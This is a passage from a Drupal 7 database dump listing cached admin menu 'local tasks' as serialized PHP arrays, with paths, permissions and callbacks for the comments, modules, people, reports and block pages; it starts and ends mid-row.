comments\";}\";s:13:\"page_callback\";s:13:\"comment_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:13:\"admin/content\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:8:\"Comments\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"134\";s:11:\"description\";s:59:\"List and edit site comments and the comment approval queue.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:33:\"modules/comment/comment.admin.inc\";}i:4;a:23:{s:4:\"path\";s:30:\"admin/content/comment/approval\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"administer comments\";}\";s:13:\"page_callback\";s:13:\"comment_admin\";s:14:\"page_arguments\";s:25:\"a:1:{i:0;s:8:\"approval\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:21:\"admin/content/comment\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:19:\"Unapproved comments\";s:14:\"title_callback\";s:25:\"comment_count_unpublished\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:33:\"modules/comment/comment.admin.inc\";}}',0,1423658880,1),('local_tasks:admin/dashboard','a:1:{i:0;a:23:{s:4:\"path\";s:15:\"admin/dashboard\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-15\";s:12:\"include_file\";s:0:\"\";}}',0,1423775242,1),('local_tasks:admin/modules','a:5:{i:0;a:23:{s:4:\"path\";s:13:\"admin/modules\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"-2\";s:12:\"include_file\";s:31:\"modules/system/system.admin.inc\";}i:1;a:23:{s:4:\"path\";s:18:\"admin/modules/list\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:13:\"admin/modules\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:4:\"List\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:31:\"modules/system/system.admin.inc\";}i:2;a:23:{s:4:\"path\";s:20:\"admin/modules/update\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:61:\"a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:6:\"module\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:13:\"admin/modules\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:6:\"Update\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"10\";s:12:\"include_file\";s:33:\"modules/update/update.manager.inc\";}i:3;a:23:{s:4:\"path\";s:23:\"admin/modules/uninstall\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:42:\"a:1:{i:0;s:24:\"system_modules_uninstall\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:13:\"admin/modules\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:9:\"Uninstall\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"20\";s:12:\"include_file\";s:31:\"modules/system/system.admin.inc\";}i:4;a:23:{s:4:\"path\";s:21:\"admin/modules/install\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:62:\"a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:6:\"module\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:13:\"admin/modules\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:18:\"Install new module\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"25\";s:12:\"include_file\";s:33:\"modules/update/update.manager.inc\";}}',0,1423658761,1),('local_tasks:admin/people','a:6:{i:0;a:23:{s:4:\"path\";s:19:\"admin/people/people\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:12:\"admin/people\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:4:\"List\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:50:\"Find and manage people interacting with your site.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:27:\"modules/user/user.admin.inc\";}i:1;a:23:{s:4:\"path\";s:29:\"admin/people/permissions/list\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:40:\"a:1:{i:0;s:22:\"administer permissions\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:40:\"a:1:{i:0;s:22:\"user_admin_permissions\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:24:\"admin/people/permissions\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:11:\"Permissions\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:64:\"Determine access to features by selecting permissions for roles.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"-8\";s:12:\"include_file\";s:27:\"modules/user/user.admin.inc\";}i:2;a:23:{s:4:\"path\";s:30:\"admin/people/permissions/roles\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:40:\"a:1:{i:0;s:22:\"administer permissions\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:34:\"a:1:{i:0;s:16:\"user_admin_roles\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:24:\"admin/people/permissions\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:5:\"Roles\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:30:\"List, edit, or add user roles.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"-5\";s:12:\"include_file\";s:27:\"modules/user/user.admin.inc\";}i:3;a:23:{s:4:\"path\";s:12:\"admin/people\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:8:\"position\";s:4:\"left\";s:6:\"weight\";s:2:\"-4\";s:12:\"include_file\";s:27:\"modules/user/user.admin.inc\";}i:4;a:23:{s:4:\"path\";s:19:\"admin/people/create\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"create\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:12:\"admin/people\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:8:\"Add user\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/user/user.admin.inc\";}i:5;a:23:{s:4:\"path\";s:24:\"admin/people/permissions\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:40:\"a:1:{i:0;s:22:\"administer permissions\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:40:\"a:1:{i:0;s:22:\"user_admin_permissions\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:12:\"admin/people\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:11:\"Permissions\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:64:\"Determine access to features by selecting permissions for roles.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/user/user.admin.inc\";}}',0,1423658773,1),('local_tasks:admin/reports','a:1:{i:0;a:23:{s:4:\"path\";s:13:\"admin/reports\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:8:\"position\";s:4:\"left\";s:6:\"weight\";s:1:\"5\";s:12:\"include_file\";s:31:\"modules/system/system.admin.inc\";}}',0,1423659027,1),('local_tasks:admin/reports/dblog','a:1:{i:0;a:23:{s:4:\"path\";s:19:\"admin/reports/dblog\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:14:\"dblog_overview\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/dblog\";s:5:\"title\";s:19:\"Recent log messages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View events that have recently been logged.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"-1\";s:12:\"include_file\";s:29:\"modules/dblog/dblog.admin.inc\";}}',0,1423659033,1),('local_tasks:admin/reports/fields','a:1:{i:0;a:23:{s:4:\"path\";s:20:\"admin/reports/fields\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:20:\"field_ui_fields_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/fields\";s:5:\"title\";s:10:\"Field list\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:39:\"Overview of fields on all entity types.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:35:\"modules/field_ui/field_ui.admin.inc\";}}',0,1423659086,1),('local_tasks:admin/reports/hits','a:1:{i:0;a:23:{s:4:\"path\";s:18:\"admin/reports/hits\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:22:\"statistics_recent_hits\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/reports/hits\";s:5:\"title\";s:11:\"Recent hits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View pages that have recently been visited.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:39:\"modules/statistics/statistics.admin.inc\";}}',0,1423659098,1),('local_tasks:admin/reports/updates','a:5:{i:0;a:23:{s:4:\"path\";s:21:\"admin/reports/updates\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:17:\"Available updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-50\";s:12:\"include_file\";s:32:\"modules/update/update.report.inc\";}i:1;a:23:{s:4:\"path\";s:26:\"admin/reports/updates/list\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:4:\"List\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:32:\"modules/update/update.report.inc\";}i:2;a:23:{s:4:\"path\";s:28:\"admin/reports/updates/update\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:61:\"a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:6:\"report\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:6:\"Update\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"10\";s:12:\"include_file\";s:33:\"modules/update/update.manager.inc\";}i:3;a:23:{s:4:\"path\";s:29:\"admin/reports/updates/install\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:62:\"a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:6:\"report\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:27:\"Install new module or theme\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"25\";s:12:\"include_file\";s:33:\"modules/update/update.manager.inc\";}i:4;a:23:{s:4:\"path\";s:30:\"admin/reports/updates/settings\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:33:\"a:1:{i:0;s:15:\"update_settings\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:8:\"Settings\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"50\";s:12:\"include_file\";s:34:\"modules/update/update.settings.inc\";}}',0,1426848142,1),('local_tasks:admin/reports/visitors','a:1:{i:0;a:23:{s:4:\"path\";s:22:\"admin/reports/visitors\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_top_visitors\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/visitors\";s:5:\"title\";s:12:\"Top visitors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View visitors that hit many pages.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"2\";s:12:\"include_file\";s:39:\"modules/statistics/statistics.admin.inc\";}}',0,1423659117,1),('local_tasks:admin/structure/block/manage/%/%','a:2:{i:0;a:23:{s:4:\"path\";s:32:\"admin/structure/block/manage/%/%\";s:14:\"load_functions\";s:18:\"a:2:{i:4;N;i:5;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:55:\"a:3:{i:0;s:21:\"block_admin_configure\";i:1;i:4;i:2;i:5;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"60\";s:12:\"number_parts\";s:1:\"6\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:32:\"admin/structure/block/manage/%/%\";s:5:\"title\";s:15:\"Configure block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:29:\"modules/block/block.admin.inc\";}i:1;a:23:{s:4:\"path\";s:39:\"admin/structure/block/manage/%/%/delete\";s:14:\"load_functions\";s:18:\"a:2:{i:4;N;i:5;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:59:\"a:3:{i:0;s:25:\"block_custom_block_delete\";i:1;i:4;i:2;i:5;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:3:\"121\";s:12:\"number_parts\";s:1:\"7\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:32:\"admin/structure/block/manage/%/%\";s:8:\"tab_root\";s:32:\"admin/structure/block/manage/%/%\";s:5:\"title\";s:12:\"Delete 